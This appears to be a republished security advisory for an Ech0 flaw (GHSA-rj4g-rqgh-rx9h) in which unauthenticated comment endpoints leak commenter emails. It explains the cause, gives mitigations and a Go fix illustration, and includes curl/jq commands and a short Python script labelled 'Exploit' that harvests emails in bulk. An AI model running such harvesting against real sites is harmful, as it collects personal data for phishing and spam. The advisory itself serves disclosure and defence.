Ech0, PII Leak, GHSA-rj4g-rqgh-rx9h (Medium)


How GHSA-rj4g-rqgh-rx9h Works

The `Comment` model in `internal/model/comment/comment.go` (lines 33–37) defines an `Email` field tagged `json:"email"`, while the adjacent PII fields `IPHash` and `UserAgent` correctly use `json:"-"` to keep them out of API responses. The public endpoints `GET /api/comments?echo_id=X` and `GET /api/comments/public?limit=N` are both mounted on the unauthenticated PublicRouterGroup. Their handlers call `ListPublicByEchoID` (service layer, line 329) or `ListPublicComments` (line 340), which return slices of full `Comment` structs and hand them straight to ctx.JSON. Because `Email` lacks the `json:"-"` tag, GORM loads the complete struct and the Gin-based API serializes it verbatim, so every commenter's email address is returned to anyone who can reach the endpoint, no authentication required.
Platform: Ech0
Version: < 1.4.8
Vulnerability : PII Exposure
Severity: Medium
Date: 2026‑05‑03

Prediction: Patch 2026‑05‑03

What Undercode Say:

# Search for exposed emails in API output
curl -s "http://localhost:8300/api/comments/public?limit=100" | jq '.data[].email'
# Count unique exposed emails
curl -s "http://localhost:8300/api/comments/public?limit=1000" | jq '[.data[].email] | unique | length'
# Check whether the email key is still present in the response (first comment of one echo)
curl -s "http://localhost:8300/api/comments?echo_id=YOUR_ECHO_ID" | jq '.data[0] | has("email")'

Exploit:

import requests

TARGET = "http://localhost:8300"

# Harvest emails from the cross-echo public feed (unauthenticated endpoint)
r = requests.get(f"{TARGET}/api/comments/public", params={"limit": 1000}, timeout=10)
r.raise_for_status()
emails = [c.get("email") for c in r.json()["data"] if c.get("email")]
print(f"Exposed {len(emails)} guest commenter email addresses")

Protection from this vulnerability

  1. Change the JSON tag on the `Email` field to `json:"-"` to match `IPHash` and `UserAgent`.
  2. Alternatively, introduce a `PublicComment` DTO that projects only non‑sensitive fields and use that for public API responses; a DTO also prevents any field added to `Comment` later from leaking by default.
  3. Upgrade to Ech0 version ≥ `1.4.8-0.20260503034700-cb8d7a997dd8` where the fix is applied.
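The following Go program is an added illustration written for this page; it is not Ech0 code. It reproduces only what the advisory states about the struct tags (`Email` serialized, `IPHash` and `UserAgent` hidden with `json:"-"`) and the `data` key that the jq filters above rely on; every other field name, the response wrapper and the sample records are assumptions. It serializes the same constructed comments once through the vulnerable struct and once through a `PublicComment` DTO (mitigation 2), then runs the same "is there an email key" check the curl/jq section performs, so you can see which output leaks. Mitigation 1 is the one-line tag change to `json:"-"`; it is not repeated as a second type.

```go
package main

import (
	"encoding/json"
	"fmt"
)

// Comment mirrors the tag layout the advisory describes: Email is serialized,
// IPHash and UserAgent are hidden by json:"-". The remaining fields are
// assumed for illustration and are not copied from the Ech0 source.
type Comment struct {
	ID        uint   `json:"id"`
	EchoID    uint   `json:"echo_id"`
	Nickname  string `json:"nickname"`
	Email     string `json:"email"` // the defect: should be json:"-" (mitigation 1)
	Content   string `json:"content"`
	IPHash    string `json:"-"`
	UserAgent string `json:"-"`
}

// PublicComment is the DTO of mitigation 2. It carries only fields that are
// safe to publish; Email, IPHash and UserAgent do not exist on it at all.
type PublicComment struct {
	ID       uint   `json:"id"`
	EchoID   uint   `json:"echo_id"`
	Nickname string `json:"nickname"`
	Content  string `json:"content"`
}

// ToPublic projects stored comments onto the DTO before they reach ctx.JSON.
func ToPublic(cs []Comment) []PublicComment {
	out := make([]PublicComment, 0, len(cs))
	for _, c := range cs {
		out = append(out, PublicComment{ID: c.ID, EchoID: c.EchoID, Nickname: c.Nickname, Content: c.Content})
	}
	return out
}

// envelope is the assumed response wrapper; only the "data" key is taken
// from the advisory's jq filters (.data[].email).
type envelope struct {
	Data any `json:"data"`
}

// RenderVulnerable serializes full Comment structs, as the unpatched handlers do.
func RenderVulnerable(cs []Comment) ([]byte, error) {
	return json.Marshal(envelope{Data: cs})
}

// RenderPublic serializes the DTO projection instead.
func RenderPublic(cs []Comment) ([]byte, error) {
	return json.Marshal(envelope{Data: ToPublic(cs)})
}

// ExposedEmails is the curl/jq check in Go form: it parses a response body
// and returns every non-empty "email" value found in the data rows.
func ExposedEmails(body []byte) ([]string, error) {
	var resp struct {
		Data []map[string]json.RawMessage `json:"data"`
	}
	if err := json.Unmarshal(body, &resp); err != nil {
		return nil, err
	}
	var emails []string
	for _, row := range resp.Data {
		raw, ok := row["email"]
		if !ok {
			continue
		}
		var e string
		if err := json.Unmarshal(raw, &e); err == nil && e != "" {
			emails = append(emails, e)
		}
	}
	return emails, nil
}

// sampleComments is constructed test data, not real Ech0 records.
func sampleComments() []Comment {
	return []Comment{
		{ID: 1, EchoID: 7, Nickname: "alice", Email: "alice@example.com", Content: "nice post", IPHash: "9f2c...", UserAgent: "Mozilla/5.0"},
		{ID: 2, EchoID: 7, Nickname: "bob", Email: "bob@example.org", Content: "+1", IPHash: "c1d4...", UserAgent: "curl/8.0"},
	}
}

func main() {
	cs := sampleComments()
	vuln, _ := RenderVulnerable(cs)
	fixed, _ := RenderPublic(cs)
	leaked, _ := ExposedEmails(vuln)
	clean, _ := ExposedEmails(fixed)
	fmt.Printf("unpatched: %d emails exposed: %v\n", len(leaked), leaked)
	fmt.Printf("DTO:       %d emails exposed\n", len(clean))
	fmt.Println(string(fixed))
}
```

Note that even the vulnerable output never contains `IPHash` or `UserAgent`, which is exactly why the advisory singles out the missing tag on `Email`: the hiding mechanism was in place, it was simply not applied to one field. The DTO removes the dependency on per-field discipline altogether.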

Impact

  • Anonymous attacker harvests all guest commenter email addresses via unauthenticated HTTP calls.
  • Emails collected can be correlated with nicknames and echo topics to conduct targeted phishing or spam campaigns.
  • Exposes personal data (email addresses) to any internet visitor without consent, which is likely to qualify as a personal‑data breach under GDPR/CCPA and may trigger notification obligations for the site operator.


Sources:

Reported By: github.com